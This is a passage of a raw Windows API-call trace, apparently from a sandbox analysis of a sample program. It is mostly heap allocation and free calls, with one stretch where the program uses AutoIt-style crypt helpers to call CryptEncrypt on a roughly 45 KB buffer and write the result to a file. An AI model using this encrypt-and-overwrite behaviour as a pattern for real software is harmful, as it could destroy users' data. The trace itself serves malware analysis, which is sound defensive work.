lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.345] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0378 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0115.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0115.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0115.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0115.346] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0115.346] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.346] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0115.346] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.346] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0115.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cacb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0115.346] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e2e0*=0xafc6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e2e0*=0xafd0) returned 1 [0115.346] CharLowerBuffW (in: lpsz="byte[45009]", cchLength=0xb | out: lpsz="byte[45009]") returned 0xb [0115.346] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.346] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0115.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0115.347] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4536f80*, pdwDataLen=0x144e2e0*=0xafc6, dwBufLen=0xafd0 | out: pbData=0x4536f80*, pdwDataLen=0x144e2e0*=0xafd0) returned 1 [0115.347] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0115.347] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0115.347] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.347] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xafd0, lpNumberOfBytesWritten=0x144ece4, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ece4*=0xafd0, lpOverlapped=0x0) returned 1 [0115.348] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0115.349] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.349] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0115.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca9a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0115.349] CryptDestroyKey (hKey=0x41ac700) returned 1 [0115.349] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0115.349] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0115.349] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.349] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0115.349] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0115.349] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.349] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.349] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0115.349] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0115.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0115.349] CryptReleaseContext (hProv=0x41a4590, dwFlags=0x0) returned 1 [0115.349] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.350] TranslateMessage (lpMsg=0x144e7a4) returned 0 [0115.350] DispatchMessageW (lpMsg=0x144e7a4) returned 0x0 [0115.350] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0115.350] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0115.350] PeekMessageW (in: lpMsg=0x144e7a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7a4) returned 0 [0115.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0115.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0115.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0115.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0115.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.350] FreeLibrary (hLibModule=0x756e0000) returned 1 [0115.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0115.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0115.350] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0115.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0115.350] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0115.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0115.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0115.350] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0115.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0115.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0115.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0115.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0115.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0115.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0115.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0115.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0115.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0115.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0115.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0115.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0115.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0115.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0115.351] CloseHandle (hObject=0x258) returned 1 [0115.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0115.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eaa90 | out: hHeap=0x1780000) returned 1 [0115.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0115.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0115.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0115.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0115.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0115.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0115.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0115.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0115.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0115.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0115.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0115.352] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0115.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0115.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0115.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0115.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0115.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0115.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0115.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0115.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0115.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0115.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0115.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0115.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0115.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0115.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0115.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0115.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.353] CloseHandle (hObject=0x298) returned 1 [0115.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0115.357] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0115.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0115.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0115.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0115.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0115.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0115.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0115.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0115.359] HeapFree (in: 